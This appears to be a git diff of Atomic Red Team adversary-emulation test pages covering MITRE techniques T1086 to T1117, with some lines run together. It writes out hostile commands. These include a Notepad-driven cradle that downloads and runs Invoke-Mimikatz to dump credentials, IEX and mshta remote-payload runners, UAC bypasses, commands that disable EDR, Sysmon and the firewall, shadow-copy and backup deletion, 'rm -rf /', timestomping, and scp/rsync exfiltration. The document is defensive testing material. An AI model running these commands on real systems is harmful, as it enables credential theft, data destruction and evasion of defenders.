$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr ```
@@ -112,8 +108,7 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'" ```
@@ -133,8 +128,7 @@ Using PS 5.1, add a user via CLI | password | password to use | string | ATOM1CR3DT3@M| | description | Brief description of account | string | Atomic Things| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}' ```
@@ -153,8 +147,7 @@ Not proxy aware removing cache although does not appear to write to those locati |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" ```
@@ -173,8 +166,7 @@ Not proxy aware removing cache although does not appear to write to those locati |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" ```
@@ -192,8 +184,7 @@ Powershell xml download request |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX" ```
@@ -211,8 +202,7 @@ Powershell invoke mshta to download payload |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` "C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()" ```
@@ -225,8 +215,7 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts. **Supported Platforms:** Windows -#### Run it with these steps! -1. Open Powershell_ise as a Privileged Account +#### Run it with these steps! 1. Open Powershell_ise as a Privileged Account 2. Invoke-DownloadCradle.ps1 @@ -239,8 +228,7 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggJyVTeXN0ZW1Sb290JS9UZW1wL2FydC1tYXJrZXIudHh0JyAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART))) ``` diff --git a/atomics/T1087/T1087.md b/atomics/T1087/T1087.md index eb6b877a..13806a0c 100644 --- a/atomics/T1087/T1087.md +++ b/atomics/T1087/T1087.md @@ -54,8 +54,7 @@ Enumerate all accounts by copying /etc/passwd to another file |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | ~/loot.txt| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` cat /etc/passwd > #{output_file} ```
@@ -72,8 +71,7 @@ xxx (requires root) |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | ~/loot.txt| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` cat /etc/sudoers > #{output_file} ```
@@ -90,8 +88,7 @@ View accounts wtih UID 0 |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | ~/loot.txt| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` grep 'x:0:' /etc/passwd > #{output_file} - name: List opened files by user ```
@@ -103,8 +100,7 @@ List opened files by user **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username ```
@@ -121,8 +117,7 @@ Show if a user account has ever logger in remotely |------|-------------|------|---------------| | output_file | Path where captured results will be placed | Path | ~/loot.txt| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` lastlog > #{output_file} ```
@@ -134,8 +129,7 @@ Utilize groups and id to enumerate users and groups **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` groups id ``` @@ -148,8 +142,7 @@ Utilize local utilities to enumerate users and groups **Supported Platforms:** macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` dscl . list /Groups dscl . list /Users dscl . list /Users | grep -v '_' @@ -165,8 +158,7 @@ Enumerate all accounts **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net user net user /domain dir c:\Users\ @@ -183,8 +175,7 @@ Enumerate all accounts via PowerShell **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` net user net user /domain get-localuser @@ -206,8 +197,7 @@ Enumerate logged on users **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` query user ```
@@ -219,8 +209,7 @@ Enumerate logged on users via PowerShell **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` query user ```
diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md index 45b94964..679cf329 100644 --- a/atomics/T1088/T1088.md +++ b/atomics/T1088/T1088.md @@ -34,8 +34,7 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f cmd.exe /c eventvwr.msc ``` @@ -53,8 +52,7 @@ PowerShell code to bypass User Account Control using Event Viewer and a relevant |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force Start-Process "C:\Windows\System32\eventvwr.msc" @@ -73,8 +71,7 @@ Bypasses User Account Control using the Windows 10 Features on Demand Helper (fo |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" fodhelper.exe @@ -93,8 +90,7 @@ PowerShell code to bypass User Account Control using the Windows 10 Features on |------|-------------|------|---------------| | executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force diff --git a/atomics/T1089/T1089.md b/atomics/T1089/T1089.md index 58e645b2..72cc56f0 100644 --- a/atomics/T1089/T1089.md +++ b/atomics/T1089/T1089.md @@ -33,8 +33,7 @@ Disables the iptables firewall **Supported Platforms:** Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; then service iptables stop @@ -55,8 +54,7 @@ Disables syslog collection **Supported Platforms:** Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; then service rsyslog stop @@ -75,8 +73,7 @@ Disable the Cb Response service **Supported Platforms:** Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ]; then service cbdaemon stop @@ -95,8 +92,7 @@ Disables SELinux enforcement **Supported Platforms:** Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` setenforce 0 ```
@@ -108,8 +104,7 @@ Disables Carbon Black Response **Supported Platforms:** macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist ```
@@ -121,8 +116,7 @@ Disables LittleSnitch **Supported Platforms:** macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist ```
@@ -134,8 +128,7 @@ Disables OpenDNS Umbrella **Supported Platforms:** macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist ```
@@ -152,8 +145,7 @@ Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon servic |------|-------------|------|---------------| | sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) ``` fltmc.exe unload #{sysmon_driver} ```
@@ -171,8 +163,7 @@ This action requires HTTP logging configurations in IIS to be unlocked. |------|-------------|------|---------------| | website_name | The name of the website on a server | string | Default Web Site| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true ```
@@ -184,8 +175,7 @@ Uninstall Sysinternals Sysmon for Defense Evasion **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) ``` sysmon -u ```
diff --git a/atomics/T1090/T1090.md b/atomics/T1090/T1090.md index cbf73a16..fe5296e0 100644 --- a/atomics/T1090/T1090.md +++ b/atomics/T1090/T1090.md @@ -31,8 +31,7 @@ Note that this test may conflict with pre-existing system configuration. | proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080| | proxy_scheme | Protocol to proxy (http or https) | string | http| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` export #{proxy_scheme}_proxy=#{proxy_server} ```
diff --git a/atomics/T1096/T1096.md b/atomics/T1096/T1096.md index 46d1ac83..da71b4a2 100644 --- a/atomics/T1096/T1096.md +++ b/atomics/T1096/T1096.md @@ -26,8 +26,7 @@ Execute from Alternate Streams |------|-------------|------|---------------| | path | Path of ADS file | path | c:\ADS\| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe diff --git a/atomics/T1097/T1097.md b/atomics/T1097/T1097.md index 02d2b600..84ecd61d 100644 --- a/atomics/T1097/T1097.md +++ b/atomics/T1097/T1097.md @@ -27,8 +27,7 @@ Similar to PTH, but attacking Kerberos | user_name | username | string | Administrator| | domain | domain | string | atomic.local| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` mimikatz # kerberos::ptt #{user_name}@#{domain} ```
diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md index be4dab0b..ba9b7115 100644 --- a/atomics/T1098/T1098.md +++ b/atomics/T1098/T1098.md @@ -15,8 +15,7 @@ Manipulate Admin Account Name **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` $x = Get-Random -Minimum 2 -Maximum 9999 $y = Get-Random -Minimum 2 -Maximum 9999 $z = Get-Random -Minimum 2 -Maximum 9999 diff --git a/atomics/T1099/T1099.md b/atomics/T1099/T1099.md index 8d1f2314..739f6599 100644 --- a/atomics/T1099/T1099.md +++ b/atomics/T1099/T1099.md @@ -32,8 +32,7 @@ Stomps on the access timestamp of a file |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` touch -a -t 197001010000.00 #{target_filename} ```
@@ -50,8 +49,7 @@ Stomps on the modification timestamp of a file |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` touch -m -t 197001010000.00 #{target_filename} ```
@@ -71,8 +69,7 @@ Sudo or root privileges are required to change date. Use with caution. |------|-------------|------|---------------| | target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` NOW=$(date) date -s "1970-01-01 00:00:00" touch #{target_filename} @@ -96,8 +93,7 @@ This technique was used by the threat actor Rocke during the compromise of Linux | reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh| | target_file_path | Path of file to modify timestamps of | Path | /opt/filename| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` touch -acmr #{reference_file_path} {target_file_path} ```
@@ -117,8 +113,7 @@ This technique was seen in use by the Stitch RAT. | file_path | Path of file to change creation timestamp | Path | C:\Some\file.txt| | target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} } ```
@@ -138,8 +133,7 @@ This technique was seen in use by the Stitch RAT. | file_path | Path of file to change last modified timestamp | Path | C:\Some\file.txt| | target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} } ```
@@ -159,8 +153,7 @@ This technique was seen in use by the Stitch RAT. | file_path | Path of file to change last access timestamp | Path | C:\Some\file.txt| | target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} } ```
diff --git a/atomics/T1100/T1100.md b/atomics/T1100/T1100.md index 9f2ac967..0dbc17b7 100644 --- a/atomics/T1100/T1100.md +++ b/atomics/T1100/T1100.md @@ -25,8 +25,7 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/ | web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot| | web_shells | Path of Web Shell | path | C:\AtomicRedTeam\atomics\T1100\shells\| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` xcopy #{web_shells} #{web_shell_path} ```
diff --git a/atomics/T1101/T1101.md b/atomics/T1101/T1101.md index dd62804c..45c1b52e 100644 --- a/atomics/T1101/T1101.md +++ b/atomics/T1101/T1101.md @@ -20,8 +20,7 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio |------|-------------|------|---------------| | fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` # run these in sequence $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' $SecurityPackagesUpdated = $SecurityPackages diff --git a/atomics/T1103/T1103.md b/atomics/T1103/T1103.md index 5c34338e..06389b36 100644 --- a/atomics/T1103/T1103.md +++ b/atomics/T1103/T1103.md @@ -22,8 +22,7 @@ AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded i |------|-------------|------|---------------| | registry_file | Windows Registry File | Path | T1103.reg| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg.exe import #{registry_file} ```
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index 4bd3477f..6337796e 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -41,8 +41,7 @@ Utilize rsync to perform a remote file copy (push) | remote_host | Remote host to copy toward | String | victim-host| | remote_path | Remote path to receive rsync | Path | /tmp/victim-files| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} ```
@@ -62,8 +61,7 @@ Utilize rsync to perform a remote file copy (pull) | remote_host | Remote host to copy from | String | adversary-host| | local_path | Local path to receive rsync | Path | /tmp/victim-files| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} ```
@@ -83,8 +81,7 @@ Utilize scp to perform a remote file copy (push) | remote_host | Remote host to copy toward | String | victim-host| | remote_path | Remote path to receive scp | Path | /tmp/victim-files/| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` scp #{local_file} #{username}@#{remote_host}:#{remote_path} ```
@@ -104,8 +101,7 @@ Utilize scp to perform a remote file copy (pull) | remote_host | Remote host to copy from | String | adversary-host| | local_path | Local path to receive scp | Path | /tmp/victim-files/| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` scp #{username}@#{remote_host}:#{remote_file} #{local_path} ```
@@ -125,8 +121,7 @@ Utilize sftp to perform a remote file copy (push) | remote_host | Remote host to copy toward | String | victim-host| | remote_path | Remote path to receive sftp | Path | /tmp/victim-files/| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}' ```
@@ -146,8 +141,7 @@ Utilize sftp to perform a remote file copy (pull) | remote_host | Remote host to copy from | String | adversary-host| | local_path | Local path to receive sftp | Path | /tmp/victim-files/| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` sftp #{username}@#{remote_host}:#{remote_file} #{local_path} ```
@@ -165,8 +159,7 @@ Use certutil -urlcache argument to download a file from the web. Note - /urlcach | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | Path | Atomic-license.txt| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` cmd /c certutil -urlcache -split -f #{remote_file} #{local_path} ```
@@ -184,8 +177,7 @@ Use certutil -verifyctl argument to download a file from the web. Note - /verify | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | Path | Atomic-license.txt| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` $datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)" New-Item -Path $datePath -ItemType Directory Set-Location $datePath @@ -209,8 +201,7 @@ This technique is used by Qbot malware to download payloads. | remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt| | local_path | Local path to place file | Path | Atomic-license.txt| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path} ```
diff --git a/atomics/T1107/T1107.md b/atomics/T1107/T1107.md index b72842d2..193d78d4 100644 --- a/atomics/T1107/T1107.md +++ b/atomics/T1107/T1107.md @@ -44,8 +44,7 @@ Delete a single file from the temporary directory |------|-------------|------|---------------| | file_to_delete | Path of file to delete | Path | /tmp/victim-files/a| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` rm -f #{file_to_delete} ```
@@ -62,8 +61,7 @@ Recursively delete the temporary directory and all files contained within it |------|-------------|------|---------------| | folder_to_delete | Path of folder to delete | Path | /tmp/victim-files| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` rm -rf #{folder_to_delete} ```
@@ -80,8 +78,7 @@ Use the `shred` command to overwrite the temporary file and then delete it |------|-------------|------|---------------| | file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` shred -u #{file_to_shred} ```
@@ -98,8 +95,7 @@ Delete a single file from the temporary directory using cmd.exe |------|-------------|------|---------------| | file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-cmd\a| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` del /f #{file_to_delete} ```
@@ -116,8 +112,7 @@ Recursively delete the temporary directory and all files contained within it usi |------|-------------|------|---------------| | folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-cmd| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` del /f /S #{folder_to_delete} ```
@@ -134,8 +129,7 @@ Delete a single file from the temporary directory using Powershell |------|-------------|------|---------------| | file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-ps\a| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Remove-Item -path "#{file_to_delete}" ```
@@ -152,8 +146,7 @@ Recursively delete the temporary directory and all files contained within it usi |------|-------------|------|---------------| | folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-ps| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Remove-Item -path "#{folder_to_delete}" -recurse ```
@@ -165,8 +158,7 @@ Delete all volume shadow copies with vssadmin.exe **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` vssadmin.exe Delete Shadows /All /Quiet ```
@@ -178,8 +170,7 @@ Delete all volume shadow copies with wmic **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wmic shadowcopy delete ```
@@ -191,8 +182,7 @@ This test leverages `bcdedit` to remove boot-time recovery measures. **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit /set {default} recoveryenabled no ``` @@ -205,8 +195,7 @@ This test deletes Windows Backup catalogs. **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wbadmin delete catalog -quiet ```
@@ -218,8 +207,7 @@ This test deletes the entire root filesystem of a Linux system. This technique w **Supported Platforms:** Linux, CentOS, Ubuntu -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` rm -rf / --no-preserve-root > /dev/null 2> /dev/null ```
diff --git a/atomics/T1110/T1110.md b/atomics/T1110/T1110.md index 3688a13c..ceb3c7ba 100644 --- a/atomics/T1110/T1110.md +++ b/atomics/T1110/T1110.md @@ -47,8 +47,7 @@ Creates username and password files then attempts to brute force on remote host | remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$| | domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net user /domain > #{input_file_users} echo "Password1" >> #{input_file_passwords} echo "1q2w3e4r" >> #{input_file_passwords} diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index 06ad2d53..f47edeb8 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md @@ -25,8 +25,7 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f ```
@@ -39,8 +38,7 @@ CMD is ran as Administrative rights. **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f ```
@@ -52,8 +50,7 @@ Modify a registry key of each user profile not currently loaded on the machine u **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` # here is an example of using the same method of reg load, but without the New-PSDrive cmdlet. # Here we can load all unloaded user hives and do whatever we want in the location below (comments) $PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$' diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md index 01bf29ce..b5f3eb36 100644 --- a/atomics/T1113/T1113.md +++ b/atomics/T1113/T1113.md @@ -35,8 +35,7 @@ Use screencapture command to collect a full desktop screenshot | output_file | xxx | Path | desktop.png| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` screencapture ```
@@ -54,8 +53,7 @@ Use screencapture command to collect a full desktop screenshot | output_file | xxx | Path | desktop.png| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` screencapture -x ```
@@ -73,8 +71,7 @@ Use xwd command to collect a full desktop screenshot and review file with xwud | output_file | xxx | Path | desktop.xwd| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` xwd -root -out #{output_file} xwud -in #{output_file} ``` @@ -93,8 +90,7 @@ Use import command to collect a full desktop screenshot | output_file | xxx | Path | desktop.png| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` import -window root ```
diff --git a/atomics/T1114/T1114.md b/atomics/T1114/T1114.md index 555a6561..b010105c 100644 --- a/atomics/T1114/T1114.md +++ b/atomics/T1114/T1114.md @@ -21,8 +21,7 @@ Search through local Outlook installation, extract mail, compress the contents, **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` Display email contents in the terminal PS C:\> .\Get-Inbox.ps1 diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md index d19b23f9..a7bbce56 100644 --- a/atomics/T1115/T1115.md +++ b/atomics/T1115/T1115.md @@ -25,8 +25,7 @@ Add data to clipboard to copy off or execute commands from. **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` dir | clip clip < readme.txt ``` @@ -39,8 +38,7 @@ Utilize PowerShell to echo a command to clipboard and execute it **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` echo Get-Process | clip Get-Clipboard | iex ``` diff --git a/atomics/T1117/T1117.md b/atomics/T1117/T1117.md index c6c237ae..feba33a3 100644 --- a/atomics/T1117/T1117.md +++ b/atomics/T1117/T1117.md @@ -30,8 +30,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr |------|-------------|------|---------------| | filename | Name of the local file, include path. | Path | C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` regsvr32.exe /s /u /i:#{filename} scrobj.dll ```
@@ -48,8 +47,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr |------|-------------|------|---------------| | url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` regsvr32.exe /s /u /i:#{url} scrobj.dll ```
